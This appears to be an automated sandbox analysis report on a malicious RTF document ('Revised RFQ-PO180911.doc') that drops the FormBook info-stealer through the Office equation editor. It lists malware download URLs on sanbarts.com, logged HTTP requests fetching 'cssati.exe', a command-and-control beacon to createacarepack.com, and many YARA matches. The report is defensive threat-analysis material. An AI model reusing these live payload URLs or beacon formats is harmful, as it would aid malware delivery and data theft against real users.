          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/33
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914970619.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/cssati.exej
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.971345322.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.958260640.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.958544011.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.963238551.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.939397773.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1025977451.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.953687008.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.965173113.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.941729011.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/Couri
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/YR$
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exeC:
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exekkC:
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: wuapp.exe, 00000008.00000002.1182990879.000000000293F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6C29C56C-3D5B-4878-9A01-77B8177CDD57}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: sanbarts.com
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sanbarts.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.sanbarts.com
          Source: global trafficHTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1Host: www.createacarepack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Initial sample is an obfuscated RTF file
          Source: initial sampleStatic file information: Filename: Revised RFQ-PO180911.doc
          Malicious sample detected (through community Yara rule)
          Source: Revised RFQ-PO180911.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exeJump to dropped file
          Source: Revised RFQ-PO180911.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004047EE
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00406083
